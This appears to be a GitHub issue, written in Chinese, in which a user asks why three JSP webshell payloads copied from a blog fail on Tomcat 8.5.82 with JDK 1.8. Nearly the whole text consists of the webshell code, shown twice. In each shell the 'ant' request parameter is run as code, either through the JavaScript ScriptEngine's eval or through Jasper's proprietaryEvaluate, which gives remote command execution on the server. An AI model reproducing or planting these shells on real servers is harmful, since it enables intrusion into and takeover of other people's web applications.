Open etn0tw opened 4 months ago
从博客看到尝试的,不知道是不是我操作哪里有问题? 环境 tomcat-8.5.82 jdk1.8.0_241
1、shell payload: <% try { new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant"), new javax.script.SimpleBindings(new java.util.HashMap() {{ put("response", response); put("request", request); }})); } catch (Exception e) { } %> 2、shell payload: <% out.println(new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant")));; %> 3、shell payload: <% out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter("ant"), String.class, pageContext, null)); %>
从博客看到尝试的,不知道是不是我操作哪里有问题? 环境 tomcat-8.5.82 jdk1.8.0_241
1、shell payload: <% try { new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant"), new javax.script.SimpleBindings(new java.util.HashMap() {{ put("response", response); put("request", request); }})); } catch (Exception e) { } %>
2、shell payload:
<%
out.println(new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant")));;
%>
3、shell payload:
<%
out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter("ant"), String.class, pageContext, null));
%>
